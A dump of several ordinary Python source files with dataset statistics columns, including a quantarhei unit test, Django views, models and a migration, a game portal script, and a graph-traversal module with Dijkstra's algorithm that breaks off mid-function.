| 19.285714 | 70 | 0.748148 | 18 | 135 | 5.5 | 0.611111 | 0.20202 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088889 | 135 | 6 | 71 | 22.5 | 0.804878 | 0.207407 | 0 | 0 | 0 | 0 | 0.465347 | 0.465347 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
fa4ccf64bbdebfd6cf3110ff89c3f92ea08a841e | 2,247 | py | Python | tests/unit/qm/propagators/poppropagator_test.py | slamavl/quantarhei | d822bc2db86152c418e330a9152e7866869776f7 | [
"MIT"
] | 14 | 2016-10-16T13:26:05.000Z | 2021-11-09T11:40:52.000Z | tests/unit/qm/propagators/poppropagator_test.py | slamavl/quantarhei | d822bc2db86152c418e330a9152e7866869776f7 | [
"MIT"
] | 61 | 2016-09-19T10:45:56.000Z | 2021-11-10T13:53:06.000Z | tests/unit/qm/propagators/poppropagator_test.py | slamavl/quantarhei | d822bc2db86152c418e330a9152e7866869776f7 | [
"MIT"
] | 21 | 2016-08-30T09:09:28.000Z | 2022-03-30T03:16:35.000Z | # -*- coding: utf-8 -*-
import unittest
import numpy
"""
*******************************************************************************
Tests of the quantarhei.qm.propagators.poppropagator module
*******************************************************************************
"""
from quantarhei import PopulationPropagator
from quantarhei import TimeAxis
class TestPopulationPropagator(unittest.TestCase):
"""Tests population propagator module
"""
def test_of_population_evolution_1(self):
"""Testing population evolution matrix 2x2 starting from t = 0"""
KK = numpy.array([[-1.0/100.0, 1.0/100.0],
[ 1.0/100.0, -1.0/100.0]])
U0 = numpy.eye(2)
Ntd = 10
t = TimeAxis(0.0, 1000, 1.0)
prop = PopulationPropagator(t, rate_matrix=KK)
td = TimeAxis(0.0, Ntd, 10.0)
U = prop.get_PropagationMatrix(td)
# analytical result
Ucheck = numpy.zeros((2,2,Ntd))
Ucheck[0,0,:] = 0.5*(1.0+numpy.exp(2.0*KK[0,0]*td.data))
Ucheck[1,1,:] = Ucheck[0,0,:]
Ucheck[1,0,:] = 0.5*(1.0-numpy.exp(2.0*KK[0,0]*td.data))
Ucheck[0,1,:] = Ucheck[1,0,:]
for n in range(Ntd):
numpy.testing.assert_allclose(U[:,:,n],Ucheck[:,:,n])
def test_of_population_evolution_2(self):
"""Testing population evolution matrix 2x2 starting from t > 0"""
KK = numpy.array([[-1.0/100.0, 1.0/100.0],
[ 1.0/100.0, -1.0/100.0]])
U0 = numpy.eye(2)
Ntd = 10
t = TimeAxis(0.0, 1000, 1.0)
prop = PopulationPropagator(t, rate_matrix=KK)
td = TimeAxis(2.0, Ntd, 10.0)
U = prop.get_PropagationMatrix(td)
# analytical result
Ucheck = numpy.zeros((2,2,Ntd))
Ucheck[0,0,:] = 0.5*(1.0+numpy.exp(2.0*KK[0,0]*td.data))
Ucheck[1,1,:] = Ucheck[0,0,:]
Ucheck[1,0,:] = 0.5*(1.0-numpy.exp(2.0*KK[0,0]*td.data))
Ucheck[0,1,:] = Ucheck[1,0,:]
for n in range(Ntd):
numpy.testing.assert_allclose(U[:,:,n],Ucheck[:,:,n])
| 27.072289 | 79 | 0.478416 | 293 | 2,247 | 3.62116 | 0.208191 | 0.03393 | 0.0377 | 0.04524 | 0.778511 | 0.72573 | 0.72573 | 0.72573 | 0.72573 | 0.72573 | 0 | 0.095509 | 0.296395 | 2,247 | 82 | 80 | 27.402439 | 0.575585 | 0.101469 | 0 | 0.756757 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.054054 | 1 | 0.054054 | false | 0 | 0.108108 | 0 | 0.189189 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fa679d2ad36473d072be4237fbf6535b28a6f9e8 | 165 | py | Python | docs/cookbook/defaults/test.py | BlameJohnny/redo | b08b5efcef8ab9cf9d532fdd50994e1092144924 | [
"Apache-2.0"
] | 1,002 | 2015-01-03T04:53:27.000Z | 2022-03-30T11:25:06.000Z | docs/cookbook/defaults/test.py | BlameJohnny/redo | b08b5efcef8ab9cf9d532fdd50994e1092144924 | [
"Apache-2.0"
] | 24 | 2015-08-27T20:32:56.000Z | 2021-11-30T16:59:59.000Z | docs/cookbook/defaults/test.py | BlameJohnny/redo | b08b5efcef8ab9cf9d532fdd50994e1092144924 | [
"Apache-2.0"
] | 84 | 2015-01-05T14:43:51.000Z | 2022-02-11T13:19:28.000Z | #!/usr/bin/env python
"""Test program for auto-generated version.py"""
import version
print('Version %r has build date %r'
% (version.VERSION, version.DATE))
| 23.571429 | 48 | 0.69697 | 24 | 165 | 4.791667 | 0.708333 | 0.243478 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.151515 | 165 | 6 | 49 | 27.5 | 0.821429 | 0.381818 | 0 | 0 | 1 | 0 | 0.291667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0.333333 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
d75b0646fb60d0d48af2feeab63ce12f68da8787 | 114 | py | Python | webomics/pipelines/views.py | silva1jos/webomics-tbd | f719fe0c51086fd6c67aa53d04fdea269f049d9a | [
"MIT"
] | null | null | null | webomics/pipelines/views.py | silva1jos/webomics-tbd | f719fe0c51086fd6c67aa53d04fdea269f049d9a | [
"MIT"
] | null | null | null | webomics/pipelines/views.py | silva1jos/webomics-tbd | f719fe0c51086fd6c67aa53d04fdea269f049d9a | [
"MIT"
] | null | null | null | from django.shortcuts import render
def index_view(request):
return render(request, 'pipelines/index.html')
| 19 | 50 | 0.77193 | 15 | 114 | 5.8 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.131579 | 114 | 5 | 51 | 22.8 | 0.878788 | 0 | 0 | 0 | 0 | 0 | 0.175439 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
d7930c6605e170b51f9c5e57950d9b9d4962245f | 76 | py | Python | phosphoproteomics/models.py | naderm/django_rest_omics | c6314f96f157d95cd95e03a5fdea4a1176d6d05a | [
"BSD-2-Clause"
] | null | null | null | phosphoproteomics/models.py | naderm/django_rest_omics | c6314f96f157d95cd95e03a5fdea4a1176d6d05a | [
"BSD-2-Clause"
] | null | null | null | phosphoproteomics/models.py | naderm/django_rest_omics | c6314f96f157d95cd95e03a5fdea4a1176d6d05a | [
"BSD-2-Clause"
] | null | null | null |
from django.db import models
class Phosphopeptide(models.Model):
pass
| 12.666667 | 35 | 0.763158 | 10 | 76 | 5.8 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.171053 | 76 | 5 | 36 | 15.2 | 0.920635 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
ad02341f4ca99c17a7537966a6caf9f324b5f023 | 10,143 | py | Python | project/apps/keller/migrations/0001_initial.py | bhs-contests/barberscore-api | 7bd06b074c99903f031220f41b15a22474724044 | [
"BSD-2-Clause"
] | null | null | null | project/apps/keller/migrations/0001_initial.py | bhs-contests/barberscore-api | 7bd06b074c99903f031220f41b15a22474724044 | [
"BSD-2-Clause"
] | 9 | 2020-06-05T22:17:17.000Z | 2022-03-12T00:04:00.000Z | project/apps/keller/migrations/0001_initial.py | bhs-contests/barberscore-api | 7bd06b074c99903f031220f41b15a22474724044 | [
"BSD-2-Clause"
] | null | null | null | # Generated by Django 2.1.9 on 2019-06-24 22:49
import django.contrib.postgres.fields
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
('rmanager', '0001_initial'),
('bhs', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='CleanFlat',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('points', models.IntegerField()),
],
),
migrations.CreateModel(
name='CleanPanelist',
fields=[
('id', models.IntegerField(editable=False, primary_key=True, serialize=False)),
('year', models.IntegerField()),
('season', models.IntegerField(choices=[(1, 'Summer'), (2, 'Midwinter'), (3, 'Fall'), (4, 'Spring')])),
('district', models.CharField(max_length=255)),
('convention', models.CharField(max_length=255)),
('session', models.IntegerField(choices=[(32, 'Chorus'), (41, 'Quartet'), (42, 'Mixed'), (43, 'Senior'), (44, 'Youth'), (45, 'Unknown'), (46, 'VLQ')])),
('round', models.IntegerField(choices=[(1, 'Finals'), (2, 'Semi-Finals'), (3, 'Quarter-Finals')])),
('category', models.IntegerField(choices=[(30, 'Music'), (40, 'Performance'), (50, 'Singing')])),
('num', models.IntegerField()),
('legacy_person', models.CharField(max_length=255)),
('scores', django.contrib.postgres.fields.jsonb.JSONField()),
('panelist', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='rmanager.Panelist')),
],
),
migrations.CreateModel(
name='CleanSong',
fields=[
('id', models.IntegerField(editable=False, primary_key=True, serialize=False)),
('year', models.IntegerField()),
('season', models.IntegerField(choices=[(1, 'Summer'), (2, 'Midwinter'), (3, 'Fall'), (4, 'Spring')])),
('district', models.CharField(max_length=255)),
('convention', models.CharField(max_length=255)),
('session', models.IntegerField(choices=[(32, 'Chorus'), (41, 'Quartet'), (42, 'Mixed'), (43, 'Senior'), (44, 'Youth'), (45, 'Unknown'), (46, 'VLQ')])),
('round', models.IntegerField(choices=[(1, 'Finals'), (2, 'Semi-Finals'), (3, 'Quarter-Finals')])),
('appearance_num', models.IntegerField()),
('song_num', models.IntegerField()),
('legacy_group', models.CharField(max_length=255)),
('legacy_chart', models.CharField(max_length=255)),
('scores', django.contrib.postgres.fields.jsonb.JSONField()),
('appearance', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='rmanager.Appearance')),
('song', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='rmanager.Song')),
],
),
migrations.CreateModel(
name='Complete',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('row_id', models.IntegerField(blank=True, null=True)),
('year', models.IntegerField(blank=True, null=True)),
('season_kind', models.IntegerField(blank=True, choices=[(1, 'Summer'), (2, 'Midwinter'), (3, 'Fall'), (4, 'Spring')], null=True)),
('district_code', models.CharField(blank=True, max_length=255)),
('convention_name', models.CharField(blank=True, max_length=255)),
('session_kind', models.IntegerField(blank=True, choices=[(32, 'Chorus'), (41, 'Quartet'), (42, 'Mixed'), (43, 'Senior'), (44, 'Youth'), (45, 'Unknown'), (46, 'VLQ')], null=True)),
('round_kind', models.IntegerField(blank=True, choices=[(1, 'Finals'), (2, 'Semi-Finals'), (3, 'Quarter-Finals')], null=True)),
('category_kind', models.IntegerField(blank=True, choices=[(30, 'Music'), (40, 'Performance'), (50, 'Singing')], null=True)),
('points', django.contrib.postgres.fields.ArrayField(base_field=models.IntegerField(blank=True, null=True), blank=True, null=True, size=None)),
('panelist', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='rmanager.Panelist')),
('person', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='completes', to='bhs.Person')),
],
),
migrations.CreateModel(
name='Flat',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('complete', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='flats', to='keller.Complete')),
('score', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='rmanager.Score')),
],
),
migrations.CreateModel(
name='RawPanelist',
fields=[
('id', models.IntegerField(editable=False, primary_key=True, serialize=False)),
('year', models.IntegerField()),
('season', models.CharField(max_length=255)),
('district', models.CharField(max_length=255)),
('convention', models.CharField(max_length=255)),
('session', models.CharField(max_length=255)),
('round', models.CharField(max_length=255)),
('category', models.CharField(max_length=255)),
('num', models.IntegerField(blank=True, null=True)),
('judge', models.CharField(max_length=255)),
('scores', django.contrib.postgres.fields.jsonb.JSONField()),
],
),
migrations.CreateModel(
name='RawSong',
fields=[
('id', models.IntegerField(editable=False, primary_key=True, serialize=False)),
('season', models.CharField(max_length=255)),
('year', models.IntegerField()),
('district', models.CharField(max_length=255)),
('event', models.CharField(max_length=255)),
('session', models.CharField(max_length=255)),
('group_name', models.CharField(max_length=255)),
('appearance_num', models.IntegerField()),
('song_num', models.IntegerField()),
('song_title', models.CharField(max_length=255)),
('totals', models.IntegerField()),
('scores', django.contrib.postgres.fields.jsonb.JSONField()),
],
),
migrations.CreateModel(
name='Selection',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('mark', models.BooleanField(default=False)),
('row_id', models.IntegerField(blank=True, null=True)),
('year', models.IntegerField(blank=True, null=True)),
('season_kind', models.IntegerField(blank=True, choices=[(1, 'Summer'), (2, 'Midwinter'), (3, 'Fall'), (4, 'Spring')], null=True)),
('district_code', models.CharField(blank=True, max_length=255)),
('convention_name', models.CharField(blank=True, max_length=255)),
('session_kind', models.IntegerField(blank=True, choices=[(32, 'Chorus'), (41, 'Quartet'), (42, 'Mixed'), (43, 'Senior'), (44, 'Youth'), (45, 'Unknown'), (46, 'VLQ')], null=True)),
('round_kind', models.IntegerField(blank=True, choices=[(1, 'Finals'), (2, 'Semi-Finals'), (3, 'Quarter-Finals')], null=True)),
('group_name', models.CharField(blank=True, max_length=255)),
('appearance_num', models.IntegerField(blank=True, null=True)),
('song_num', models.IntegerField(blank=True, null=True)),
('song_title', models.CharField(blank=True, max_length=255)),
('totals', models.IntegerField(blank=True, null=True)),
('points', django.contrib.postgres.fields.ArrayField(base_field=models.IntegerField(blank=True, null=True), blank=True, null=True, size=None)),
('song', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='rmanager.Song')),
],
),
migrations.AddField(
model_name='flat',
name='selection',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='flats', to='keller.Selection'),
),
migrations.AddField(
model_name='cleanflat',
name='cleanpanelist',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='cleanflats', to='keller.CleanPanelist'),
),
migrations.AddField(
model_name='cleanflat',
name='cleansong',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='cleanflats', to='keller.CleanSong'),
),
migrations.AddField(
model_name='cleanflat',
name='score',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='rmanager.Score'),
),
migrations.AlterUniqueTogether(
name='flat',
unique_together={('complete', 'selection', 'score')},
),
migrations.AlterUniqueTogether(
name='cleanflat',
unique_together={('cleanpanelist', 'cleansong')},
),
]
| 59.315789 | 196 | 0.577147 | 1,010 | 10,143 | 5.70198 | 0.135644 | 0.121896 | 0.054176 | 0.083348 | 0.837472 | 0.805869 | 0.752214 | 0.723042 | 0.682063 | 0.682063 | 0 | 0.026402 | 0.249433 | 10,143 | 170 | 197 | 59.664706 | 0.730067 | 0.004437 | 0 | 0.638037 | 1 | 0 | 0.146593 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.030675 | 0 | 0.055215 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ad0d3000ed7a4634033b1ce00bdd993cdd7ea6e4 | 47 | py | Python | scripts/portal/dublportal100.py | G00dBye/YYMS | 1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb | [
"MIT"
] | 54 | 2019-04-16T23:24:48.000Z | 2021-12-18T11:41:50.000Z | scripts/portal/dublportal100.py | G00dBye/YYMS | 1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb | [
"MIT"
] | 3 | 2019-05-19T15:19:41.000Z | 2020-04-27T16:29:16.000Z | scripts/portal/dublportal100.py | G00dBye/YYMS | 1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb | [
"MIT"
] | 49 | 2020-11-25T23:29:16.000Z | 2022-03-26T16:20:24.000Z | # 103050100
sm.warp(103050200, 4)
sm.dispose()
| 11.75 | 21 | 0.723404 | 7 | 47 | 4.857143 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.452381 | 0.106383 | 47 | 3 | 22 | 15.666667 | 0.357143 | 0.191489 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ad59bc15df66a5d6f6a17682c953d0484283946e | 45 | py | Python | catkin_ws/src/00-infrastructure/duckieteam/include/duckieteam/__init__.py | yxiao1996/dev | e2181233aaa3d16c472b792b58fc4863983825bd | [
"CC-BY-2.0"
] | 2 | 2018-06-25T02:51:25.000Z | 2018-06-25T02:51:27.000Z | catkin_ws/src/00-infrastructure/duckieteam/include/duckieteam/__init__.py | yxiao1996/dev | e2181233aaa3d16c472b792b58fc4863983825bd | [
"CC-BY-2.0"
] | null | null | null | catkin_ws/src/00-infrastructure/duckieteam/include/duckieteam/__init__.py | yxiao1996/dev | e2181233aaa3d16c472b792b58fc4863983825bd | [
"CC-BY-2.0"
] | 2 | 2018-09-04T06:44:21.000Z | 2018-10-15T02:30:50.000Z | from .persons import *
from .robots import *
| 15 | 22 | 0.733333 | 6 | 45 | 5.5 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.177778 | 45 | 2 | 23 | 22.5 | 0.891892 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ad6a31cb2085aa5bd0305d46eb55ea7c71a04f08 | 27 | py | Python | jammit/jammit/__init__.py | granatumx/gbox-py | b3e264a22bc6a041f2dd631d952eae29c0ecae21 | [
"MIT"
] | 1 | 2021-03-04T13:04:28.000Z | 2021-03-04T13:04:28.000Z | g_packages/official_py_docker/docker/jammit/jammit/__init__.py | lanagarmire/granatumx | 3dee3a8fb2ba851c31a9f6338aef1817217769f9 | [
"MIT"
] | 16 | 2020-01-28T23:03:40.000Z | 2022-02-10T00:30:16.000Z | g_packages/official_py_docker/docker/jammit/jammit/__init__.py | lanagarmire/granatumx | 3dee3a8fb2ba851c31a9f6338aef1817217769f9 | [
"MIT"
] | 2 | 2020-06-16T16:42:40.000Z | 2020-08-28T16:59:42.000Z | from .jammit import JAMMIT
| 13.5 | 26 | 0.814815 | 4 | 27 | 5.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148148 | 27 | 1 | 27 | 27 | 0.956522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ad7b706a45500d6856a11d91d70bdd1d19d2a3c5 | 38 | py | Python | bayesian_irl/src/utils/__init__.py | clear-nus/BOIRL | cc872111fda3c7b8118e1a864831013c30f63948 | [
"MIT"
] | 1 | 2021-02-26T10:09:15.000Z | 2021-02-26T10:09:15.000Z | bayesian_irl/src/utils/__init__.py | clear-nus/BOIRL | cc872111fda3c7b8118e1a864831013c30f63948 | [
"MIT"
] | null | null | null | bayesian_irl/src/utils/__init__.py | clear-nus/BOIRL | cc872111fda3c7b8118e1a864831013c30f63948 | [
"MIT"
] | null | null | null | from .sample_demos import sample_demos | 38 | 38 | 0.894737 | 6 | 38 | 5.333333 | 0.666667 | 0.6875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.078947 | 38 | 1 | 38 | 38 | 0.914286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
ad8b2ae891c777a11dd0d08281170aecd58b4675 | 15,903 | py | Python | multiagant_task_manager/maGraphEngines.py | Benson516/multiagant_task_manager | a70eacbb47a7c7243811fbaadb5b3c4ab4c6d703 | [
"MIT"
] | null | null | null | multiagant_task_manager/maGraphEngines.py | Benson516/multiagant_task_manager | a70eacbb47a7c7243811fbaadb5b3c4ab4c6d703 | [
"MIT"
] | null | null | null | multiagant_task_manager/maGraphEngines.py | Benson516/multiagant_task_manager | a70eacbb47a7c7243811fbaadb5b3c4ab4c6d703 | [
"MIT"
] | null | null | null | """
Graph engines
These function are graph engins apecifically for useing with
the graph data structure defined by GEOMETRY_TASK_GRAPH
and its following sub-class.
"""
import Queue
# import sys
# Kernel function for finding reachability
def Explore(nid, adj, visited):
"""
Recursive function for depth-first search.
"""
visited[nid] = True
for to_nid, eid in adj[nid]:
if not visited[to_nid]:
Explore(to_nid, adj, visited)
# the end
# Kernel function for finding reachability
def Explore_capacity(nid, adj, edges, visited, T_zone, only_count_activated_agent=False):
"""
Recursive function for depth-first search.
"""
visited[nid] = True
for to_nid, eid in adj[nid]:
if not visited[to_nid] and edges[eid].is_available_for_T_zone(T_zone, only_count_activated_agent):
Explore_capacity(to_nid, adj, edges, visited, T_zone, only_count_activated_agent)
# the end
# Kernel function for finding connected components
def Explore_cc(nid, adj, visited, cc, CCnum):
"""
Recursive function for depth-first search.
"""
visited[nid] = True
CCnum[nid] = cc
for to_nid, eid in adj[nid]:
if not visited[to_nid]:
Explore_cc(to_nid, adj, visited, cc, CCnum)
# the end
# Kernel function for finding connected components
def Explore_cc_capcity(nid, adj, edges, visited, cc, CCnum, T_zone, only_count_activated_agent=False):
"""
Recursive function for depth-first search.
"""
visited[nid] = True
CCnum[nid] = cc
for to_nid, eid in adj[nid]:
if not visited[to_nid] and edges[eid].is_available_for_T_zone(T_zone, only_count_activated_agent):
Explore_cc_capcity(to_nid, adj, edges, visited, cc, CCnum, T_zone, only_count_activated_agent)
# the end
#------------------------------------------------#
def reachability(x, y, adj, edges=None, count_capacity=True, T_zone=(0,None), only_count_activated_agent=False):
"""
Finding the reachiability from node_id:x to node_id:y
Important: This method only consider the current
(a specific time instant) topological state.
"""
visited = [False for _ in range(len(adj))]
if count_capacity:
Explore_capacity(x, adj, edges, visited, T_zone, only_count_activated_agent)
else:
# Simply traverse through the topology of graph,
# not counting capacity of edges
Explore(x, adj, visited)
return visited[y]
def number_of_connected_components(adj, edges=None, count_capacity=True, T_zone=(0,None), only_count_activated_agent=False):
"""
Find the total number of connected components
Important: This method only consider the current
(a specific time instant) topological state.
"""
visited = [False for _ in range(len(adj))]
CCnum = [0 for _ in range(len(adj))]
cc = 1
if count_capacity:
for nid in range(len(adj)):
if not visited[nid]:
Explore_cc_capcity(nid, adj, edges, visited, cc, CCnum, T_zone, only_count_activated_agent)
cc += 1
else:
# Simply traverse through the topology of graph,
# not counting capacity of edges
for nid in range(len(adj)):
if not visited[nid]:
Explore_cc(nid, adj, visited, cc, CCnum)
cc += 1
return (cc-1)
# Graph traversal
#--------------------------------#
def get_path(prev, last_nid, is_reversing_path=True):
"""
This utility function help generate the path from parent list.
inputs
- prev
- last_nid: the node_id to start backtracking with
- is_reversing_path (default: True): Decide if we are going to return the path generated by following parent list
outputs
- path
"""
nid_i = last_nid;
path_inv = list()
path_inv.append(nid_i)
while True:
nid_prev = prev[nid_i]
if not nid_prev is None:
nid_i = nid_prev
path_inv.append(nid_prev)
else:
# No parent, not able to continue
break
#
if is_reversing_path:
# Reverse the path, make it from start_id to end_id
path = path_inv[::-1]
return path
else:
return path_inv
def dijkstras(adj, edges, T_zone_start, start_id, end_id, top_priority_for_activated_agent=False, agent_id=None):
"""
This method ues dijkstra alogorithm to find out the best path
or find out that there is no path at all.
Optimization problem:
Given a graph, the state of graph, the time-zone at start_id,
find a path with "valid edges" that minimize the
"duration_max" at reaching the end_id
(after passing through the last edge)
inputs
- adj: adjacent graph
- T_zone_start = (T_min, T_max)
- start_id
- end_id
- top_priority_for_activated_agent
- agent_id (default: None): If agent_id is given, ignore this agent in this edge.
outputs
- path/None: a sequence (list) of node_id from start_id to end_id
or "None" means no valid path
"""
# Decide that if we only see the activated agent!!
only_count_activated_agent = top_priority_for_activated_agent
# We minimize the T_max
id_opt_target = 1 # minimize the total duration_max
max_value = float('inf') # sys.maxsize
# Get sizes
num_nodes = len(adj)
num_edges = len(edges)
# Initialize the dist and prev
dist = [max_value for _ in range(num_nodes)] # distance list, "None" stand for infinity
prev = [None for _ in range(num_nodes)] # Parents list, "None" stands for no parent
T_zone_nodes = [(max_value, max_value) for _ in range(num_nodes)] # (T_min, T_max) of each node / "Key" for passing edges!
#-------------------------------#
# dist[s] = 0 <-- acturally, minimum distance in graph, not actually need to be zero
dist[start_id] = 0 # Count for the duration, minimum or maximum (or maybe the difference??)
T_zone_nodes[start_id] = T_zone_start
# Make a min-heap
heap = Queue.PriorityQueue()
for u in range(num_nodes):
heap.put_nowait( (dist[u], u) )
# Iteration
while (not heap.empty()):
# Get a node_id from heap (currently smallest distance)
#----------------------------------#
uh = heap.get_nowait()
# Filter out some trash in heap
while uh[0] != dist[uh[1]] and (not heap.empty()):
# Pop out old one and try new one
uh = heap.get_nowait()
if heap.empty():
# This means that the heap actually has no valuable things
# in this iteration, just leave
break
#----------------------------------#
# for all (u,v) in E
# We have to find nodes through "valid" edges
# that is, it is "possible to pass", it is activated (if we want to check)
nid_u = uh[1]
# print("uh[0] = " + str(uh[0]) + ", uh[1] = " + str(uh[1]))
for nid_v, eid in adj[nid_u]:
# Check if the edge is "valid"
# nid_u --eid--> nid_v
if edges[eid].is_possible_to_pass(T_zone_nodes[nid_u], only_count_activated_agent, agent_id):
# Relax
if id_opt_target == 2:
weight_uv = edges[eid].duration[1] - edges[eid].duration[0] # Minimoze the difference of duration_max and duration_min, for minimizing the uncertainties
else:
weight_uv = edges[eid].duration[id_opt_target] # Minimize the total duration with specified id_opt_target
#
if dist[nid_v] > (dist[nid_u] + weight_uv):
dist[nid_v] = (dist[nid_u] + weight_uv)
T_zone_nodes[nid_v] = edges[eid].get_T_zone_end_from_start(T_zone_nodes[nid_u]) # Update time_zone of the node
prev[nid_v] = nid_u
"""
print("update (u, v) = (%d, %d)" % (nid_u, nid_v))
print("dist = " + str(dist))
print("prev = " + str(prev))
print("\n")
"""
heap.put_nowait( (dist[nid_v], nid_v) )
#
# end for
# end while
"""
# Post proccesing: replace max_value with "None"
for i in range(len(dist)):
if dist[i] == max_value:
dist[i] = None
"""
# test
try:
delta_T_max = dist[end_id] - dist[start_id]
except:
delta_T_max = None
#
print("\n")
print("INFO: Dijkstra finished")
